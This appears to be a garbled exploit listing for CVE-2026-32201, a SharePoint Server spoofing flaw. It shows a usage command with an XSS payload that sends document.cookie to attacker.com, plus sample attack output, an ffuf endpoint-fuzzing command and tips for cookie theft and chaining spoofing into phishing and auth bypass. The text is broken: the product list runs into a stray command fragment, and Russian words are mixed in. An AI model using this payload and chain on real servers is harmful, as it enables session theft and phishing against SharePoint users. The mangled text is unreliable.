Exploit for Improper Input Validation in Microsoft CVE-2026-32201

## https://sploitus.com/exploit?id=47373EE1-4958-5E36-829F-2892D366ECFB
# Overview
Python exploit for CVE-2026-32201 - improper input validation в Microsoft SharePoint Server, allowing unauthenticated network spoofing (C:L/I:L).
* Affected: SharePoint Server 2016 Enterprise, 2019, Subscription Edition fetch('http://attacker.com/?c='+document.cookie)" \
  --endpoint /_layouts/15/notify.aspx
```
Output example:
```bash
[+] SharePoint detected.
[*] Sending spoofed request to https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Potential success: Check target logs/email for spoofed content.
```
# Customization
* Endpoint fuzzing: `ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt`
* XSS payload: Add JS in `--message` for cookie theft
* Chaining: Spoof → phishing link → auth bypass
# Verification
* Success indicators: 200 OK + "sent/success" in response
* Server-side: Check ULS logs/IIS logs for anomalous requests
* Impact: Monitor email/docs за forged sender, test data modification